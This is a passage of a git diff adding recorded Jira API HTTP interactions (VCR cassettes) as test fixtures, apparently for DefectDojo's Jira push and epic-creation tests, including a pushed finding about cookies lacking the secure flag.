vJTVrFJ2LPPqv3VmlSwjE6pQmn7PZd/K9ILzUnaDSKOxY9dYf8davUGeznq9fgIAAP//AwAkwxEQ + 1BsAAA== + headers: + ATL-TraceId: + - a5602597077838ab + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:51 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 008c7c90-8dee-497a-94be-16296e01cb06 + x-envoy-upstream-service-time: + - '184' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/issue/createmeta?projectKeys=NTEST&issuetypeNames=Task&expand=projects.issuetypes.fields + response: + body: + string: !!binary | + H4sIAAAAAAAAA+xWS0/jMBD+K1EOnCpCS8WiShVCy66EdoWQKFwQB5NMqKljBz/adBH/fT2JE7vQ + ZbPlsgd6qWcyj28envFzDFVJeBZP4lKKR0i1igf+OLl99gJUKQN6XQKKKGC55c21LtUkSTLIrUIm + HsU+0YwoRQnf56ATCUonpKTJKHFWk+GB/VkTFI22xALWlrqYfbuaWYqTAix5zanW1gA6JEuiibyW + zKJ6jsfH1fi4j38FqZHQ+m6MnJQ0m9aO9xrGOZLjgy/WzWhcjcY7G1b0F0xVQRjbU+7/HV/Do2p4 + 9DFfVevMHd7xdjiqDkcf81ZARk1hvbnDH729DMJuwS7aoV86C3XHjMKOQSIDlUpaaiq45Z5GdQIG + UUaVpjzVUUkhhUjk0UrIxT5qp4Lb/umDwqVgSWG1Jf4g2MPhsSNnFui0g+x7eEbUwlKGa0m4YkRD + drHxRZl7jadJTpiCgb9vOQWWYeu7g217ZYqCyDUeJTwZKsEKammsmkrnUBD8UvufxEpLyh/QwVpp + KJDjtF86cFeO096/VmIQz4k6g5wYpm8IM9ChEyVIgjnHstqq6vguLHYvZGGWOnCe6eGdIy/CzHYI + Q91eGO/s6GBMrCCrhT67cVvPtTbiSW3kBWuaiqIUHDiugbCoTuVNVYmUBDuH2npaFa8fVjkw6sv8 + 1TPbMgdyPesckyxDT4D+JBRiCfGW2mNkRGuSzguEtlNkgX4QWsD1oZ2Gok1oG9q9QkPMG/3VB/Tb + 6x+a8AjPAm4LMZTsibEbBW5t9BoErWwAsmV5gJedUAPOK/0DsLeNsNMQ+NgTxmnj3fzRjFuR6xWR + 9RykRcmonfS+pJ8vnm2+/tcXTz0z64nLKF/sODMD/derseH6a/HT0pBF9Yr0c3PDADFa4GxloKHn + qnm98JKSpguQJzY/0k4sdxdt1HtqLlZX5h4XyiXBb1O85CFbNRynWgO1bT/lxlbtyYBcT3vfYZzt + mN+cVjcgVcPeJcHLRjvMbmjTp/c7rSIn7LMbivaF3iykZjn9ZS3ZMjxwgH6RGQUyDKPTDpZPy+pW + j2ds9sZvAAAA//+8l81uwjAMx19l6p1kHeUyaeI0aQf2CGgKKEoyAUVNGezQd5+dL1rSTe1ScXUT + +5fG8d8emxsYnFpvbLPj8IBYtZVL94BeTA0ce8dXAVFlpeqbJve33xBWdzTE2doiEpZ5FQmGCM+q + VQ9dfG//VBEbm+aYmcP7QLVngmuKO7R3osAglZDgnegv1Ht34jdrxAhGpOBnpMGalnca2JjUYz4l + Y86nwbT1vgv6bmwedZ6MWkyDChnZ5VyVZw9ZJEMuJoOMUnRlbB51kTVr7HPbLzEN/Z6pAKVme9J1 + uTfD+gf0CHkxrIKxAxYhuzkzkw85fl+UJqLi/CDLI9Qh8qkq9izkjIMez1DfwxY7tEG0a7F7hUUP + 2B9kYZyK0HrK3p9Vecc23DaiA050I7rxKOK8tboZa/C87nuaTOXkkVpHVJ8EXG29HClJfSNlg53e + uvkBAAD//wMAc91BljkVAAA= + headers: + ATL-TraceId: + - cd881cbb94374b9e + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:51 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 955ad119-d32b-48fe-86df-8603cf26b01b + x-envoy-upstream-service-time: + - '89' + status: + code: 200 + message: OK +- request: + body: '{"fields": {"description": "\n\n\n\n\n\n*Title*: [Jira Api Test 4|http://localhost:8080/finding/384]\n\n*Defect + Dojo link:* http://localhost:8080/finding/384\n\n*Severity:* Low \n\n*CWE:* + [CWE-614|https://cwe.mitre.org/data/definitions/614.html]\n\n\n\n*CVE:* Unknown\n\n\n*Product/Engagement/Test:* + [Security How-to|http://localhost:8080/product/2] / [1st Quarter Engagement|http://localhost:8080/engagement/1] + / [ZAP Scan|http://localhost:8080/test/110]\n\n*Branch/Tag:* None\n\n*BuildID:* + None\n\n*Commit hash:* None\n\n*Systems/Endpoints*: \n\n* https://mainsite.com:443\n* + https://mainsite.com\n* https://mainsite.com/dashboard\n\n*Description*:\nA + cookie has been set without the secure flag, which means that the cookie can + be accessed via unencrypted connections.\n\nReference: http://www.owasp.org/index.php/Testing_for_cookies_attributes_(OWASP-SM-002)\n\nURL: + https://mainsite.com/dashboard\nMethod: GET\nParameter: opvc\nEvidence: Set-Cookie: + opvc\n\nURL: https://mainsite.com/dashboard\nMethod: GET\nParameter: dmid\nEvidence: + Set-Cookie: dmid\n\nURL: https://mainsite.com\nMethod: GET\nParameter: sitevisitscookie\nEvidence: + Set-Cookie: sitevisitscookie\n\n*Mitigation*:\nWhenever a cookie contains sensitive + information or is a session token, then it should always be passed using an + encrypted channel. Ensure that the secure flag is set for cookies containing + such sensitive information.\n\n*Impact*:\nNo impact provided\n\n*Steps to reproduce*:\nNone\n\n*References*:\nCWE-614\nWASC-13\n\n*Defect + Dojo ID:* 384\n\n*Reporter:* [(admin) ()|mailto:]\n", "priority": {"name": "Low"}, + "summary": "Jira Api Test 4"}, "update": {}}' + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Length: + - '1644' + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: PUT + uri: https://defectdojo.atlassian.net/rest/api/2/issue/10608 + response: + body: + string: '' + headers: + ATL-TraceId: + - 0487ebc78b052142 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:51 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - a9644722-46a9-41fc-aafd-73733b3706d3 + x-envoy-upstream-service-time: + - '102' + status: + code: 204 + message: No Content +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/issue/10608 + response: + body: + string: !!binary | + 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 + 1BsAAA== + headers: + ATL-TraceId: + - 8005112ad93e8690 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:55 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 3366f115-e63d-4174-9e1b-2f8abdae5805 + x-envoy-upstream-service-time: + - '143' + status: + code: 200 + message: OK +- request: + body: '{"issueKeys": ["10608"], "ignoreEpics": true}' + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Length: + - '45' + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: PUT + uri: https://defectdojo.atlassian.net/rest/greenhopper/1.0/epics/333/add + response: + body: + string: '{"errorMessages":["Issue does not exist or you do not have permission + to see it."],"errors":{}}' + headers: + ATL-TraceId: + - f9fd5a977aa39c6e + Connection: + - close + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:55 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 60cb464b-fc2c-41e7-bad6-5c5ee34b522b + x-envoy-upstream-service-time: + - '36' + status: + code: 400 + message: Bad Request +version: 1 diff --git a/unittests/vcr/jira/JIRAConfigAndPushTestApi.test_engagement_epic_creation.yaml b/unittests/vcr/jira/JIRAConfigAndPushTestApi.test_engagement_epic_creation.yaml new file mode 100644 index 00000000000..cd0026b3b19 --- /dev/null +++ b/unittests/vcr/jira/JIRAConfigAndPushTestApi.test_engagement_epic_creation.yaml @@ -0,0 +1,333 @@ +interactions: +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/serverInfo + response: + body: + string: !!binary | + H4sIAAAAAAAAA0yPQUvEMBCF/0uuttlJNmm3uYkeVGQV2j2JSNpOsJImpU2FZdn/boKL623em+/N + Y06k1QseZksU+QxhWtRm06PBLvT+y1MdrF6WQTvqMJCMfOO8DN5FmAEwChTyen/7Wj+8NNftfh3b + OBH1lqAMMnjPSI+T9ccRXWiOE8YDd9avfQy162D73whRKSDFxbzXIYEcOMuB57xoGFO8VFtBAeAG + IhzzC86xtxnGK7vNgTUclBBKllSW1R/bjY/O+AiKQsrSMGMQxa6qjBZJo2YlL+SOR8FlVxXVv4Jg + U8PTMGuS3jF6teHZdzrZJ2IvE0H3cajJ+fwDAAD//wMAuJlt8FoBAAA= + headers: + ATL-TraceId: + - 8dcffcc6a754fc9e + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:57 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 1a76bf8e-3e58-495a-8a72-6f372804bc46 + x-envoy-upstream-service-time: + - '31' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/field + response: + body: + string: !!binary | + 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 + wKGuu74AAAD//wMANYTZQH1HAAA= + headers: + ATL-TraceId: + - cb219cde6f4f4394 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:57 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 5dc2bab1-301c-4016-adf8-d3caf2893dac + x-envoy-upstream-service-time: + - '80' + status: + code: 200 + message: OK +- request: + body: '{"fields": {"project": {"key": "NTEST"}, "summary": "weekly engagement", + "description": "weekly engagement", "issuetype": {"name": "Epic"}, "customfield_10011": + "weekly engagement"}}' + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Length: + - '182' + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: POST + uri: https://defectdojo.atlassian.net/rest/api/2/issue + response: + body: + string: '{"id":"10609","key":"NTEST-457","self":"https://defectdojo.atlassian.net/rest/api/2/issue/10609"}' + headers: + ATL-TraceId: + - acb09249469fce19 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:58 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 9c6874a2-5b29-4d90-a121-4631638739aa + x-envoy-upstream-service-time: + - '533' + status: + code: 201 + message: Created +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/issue/NTEST-457 + response: + body: + string: !!binary | + H4sIAAAAAAAAA6RXbU8jNxD+K6uV7r40+5pXIiFKgatoKYd4uX6oKuSsJxtfdu2V7SVJKf+9Y3s3 + KZAgLkhIrMf2zHjmmWcmjz4sK8KpP/YlcAoS6BcGBVUdTkpQHZXNoCQdUYEkmgmuOkCZLkGTTjYj + PIdC5J0HkAr3gF5DJUEB1+6s3/GZ0ZzEg/gAFwqKKS5nWldqHEUUppBpKr6LkOiCKMUIDznoCHXo + iFQsSiOmVA1Rq2AOK7x/eXt2cxv0+kOUTK2z/vjRV2i0VhnRkAu5cs5RXOGFNE6TIO4GcXKbxuNe + 